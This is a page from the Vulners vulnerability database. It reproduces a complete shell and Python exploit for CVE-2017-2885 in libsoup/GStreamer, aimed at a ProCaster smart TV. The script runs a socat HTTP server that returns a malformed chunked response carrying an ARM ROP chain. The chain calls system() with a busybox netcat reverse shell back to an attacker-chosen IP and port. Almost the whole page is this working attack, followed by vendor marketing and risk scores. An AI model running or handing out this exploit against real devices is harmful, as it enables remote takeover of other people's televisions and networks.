Vulners
Lucene search
ProCaster LE-32F430 GStreamer souphttpsrc libsoup/2.51.3 Stack Overflow Exploit
10
#!/bin/sh
# ProCaster LE-32F430 (NotSo)SmartTV remote code execution exploit through
# GStreamer souphttpsrc libsoup/2.51.3 HTTP stack overflow (CVE-2017-2885)
# ~ def <[email protected]> 2020-02-15 ................. 850day exploit lol
# Exploit payload: ret2libc system() nc reverse shell with a clean exit()
CMD="${CMD:-/bin/busybox nc ${IP:-192.168.1.100} ${PORT:-54321} -e /bin/sh}"
case "${1:-${ACTION:-httpd}}" in # By default, start socat-based exploit server
httpd)
# Check dependencies
for PROGRAM in socat python3 dd wc; do
if ! command -v "$PROGRAM" >/dev/null; then
printf "Missing dependency: %s\n" "$PROGRAM"
exit 1
fi
done
# Parse bind address and port
case "${ARG=${2:-${HTTPD_BIND:-0.0.0.0:12345}}}" in
*:*) HTTPD_ADDR="${ARG%:*}"; HTTPD_PORT="${ARG#*:}" ;;
*) printf "Bad httpd [IPv4:PORT] bind arg: %s\n" "$ARG"; exit 1 ;;
esac >&2
# Start socat HTTP server
printf "HTTP souploit.sh server @ %s:%d\n" "$HTTPD_ADDR" "$HTTPD_PORT"
printf "Exploit system() payload: %s\n" "$CMD"
exec socat -v -x \
TCP-LISTEN:"$HTTPD_PORT,reuseaddr,fork,bind=$HTTPD_ADDR" \
EXEC:"\\'$0\\' request"
;;
-h|--help|help) printf "Usage: %s httpd [IPv4:PORT]\n" "$0"; exit 0 ;;
request) set -e ;;
*) printf "Unsupported %s action: '%s'\n" "$0" "$1" >&2; exit 1 ;;
esac
# GStreamer souphttpsrc dislikes fragmented HTTP responses (so buffer them)
flush_stdout() {
exec 1>&3 3>&-
dd if=/tmp/$$.stdout bs="$(wc -c </tmp/$$.stdout)" count=1 2>/dev/null
rm -f /tmp/$$.stdout
}
exec 3>&1 1>/tmp/$$.stdout
trap flush_stdout EXIT
# Parse HTTP request
IFS="$(printf '\t\r\n ')"
TIME="$(date '+%Y-%m-%d %H:%M:%S%z')"
if read -r METHOD URL HTTP && [ -n "$METHOD" -a -n "$URL" -a -n "$HTTP" ]; then
printf "[%s] %s %s %s\n" "$TIME" "$METHOD" "$URL" "$HTTP" >&2
while IFS="$IFS:" read -r KEY VALUE && [ -n "$KEY" -a -n "$VALUE" ]
do printf "[%s] %s: %s\n" "$TIME" "$KEY" "$VALUE"; done >&2
else
printf "[%s] '%s' '%s' '%s'\n" "$TIME" "$METHOD" "$URL" "$HTTP" >&2
printf "HTTP/1.1 400 Bad Request\r\n"
printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"
printf "Content-Length: 0\r\n"
printf "Connection: close\r\n"
printf "\r\n"
exit 0
fi
# Handle HTTP HEAD and GET
if [ "$METHOD" = "HEAD" ]; then
printf "HTTP/1.1 200 OK\r\n"
printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"
printf "Content-Type: %s\r\n" "${MIME:-"video/mp4"}"
printf "Content-Length: %d\r\n" "12345"
printf "Accept-Ranges: bytes\r\n"
printf "Connection: close\r\n"
printf "\r\n"
exit 0
elif [ "$METHOD" != "GET" ]; then
printf "HTTP/1.1 405 Not Allowed\r\n"
printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"
printf "Content-Length: 0\r\n"
printf "Connection: close\r\n"
printf "\r\n"
exit 0
fi
# Exploit payload
python3 -u - "$CMD" <<"EOF"
import sys, struct
command = sys.argv[1].encode() + b'\x00'
if len(command) > 108: raise Exception("Command length exceeds limit 108")
LE32, BE32 = lambda v: struct.pack('<I', v), lambda v: struct.pack('>I', v)
sys.stdout.buffer.write(b"".join([
#####################################
b"HTTP/1.1 206 OK\r\n", #
b"Transfer-Encoding: chunked\r\n", #
b"Connection: close\r\n", #
b"\r\n", #
#####################################
b"1\r\n", # start a chunk #
b">", # 4B alignment #
#####################################
LE32(0xAAAAAAAA), # padding #
LE32(0xBBBBBBBB), # padding #
LE32(0xCCCCCCCC), # padding #
#####################################
LE32(0x477B9C49), # (9) sym.exit
command.ljust(108), # system() command
LE32(0x4783A1E3), # (4) pc = add sp, 0x64; pop.w {r4, ..., r11, pc}
LE32(0x4784A7C7), # (7) r4 = ldr lr, [sp], 4; bx r3; bx lr
LE32(0x4783D287), # (2) r4 = mov r0, sp; blx r3
#####################################
BE32(0x01234567), # padding #
BE32(0x89ABCDEF), # padding #
#####################################
LE32(0x477C01E5), # (8) r8 = sym.system
LE32(0x477CF019), # (3) r8 = add sp, 0x6C; ldr pc, [sp], 4
LE32(0x478436F7), # (6) r10 = mov r3, r8; blx r4
LE32(0x478436F7), # (1) r10 = mov r3, r8; blx r4
LE32(0x477927A3), # (5) pc = sub sp, 0x98; bx r10
LE32(0x477927A3), # (0) pc = sub sp, 0x98; bx r10
#####################################
LE32(0x4787BB08), # valid pointer #
LE32(0x4787BB08), # valid pointer #
#####################################
b"\r\n" # payload EOF # 248B
#####################################
]))
EOF
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Dec 2020 00:00Current
10High risk
Vulners AI Score10
CVSS 39.8
CVSS 27.5
EPSS0.24624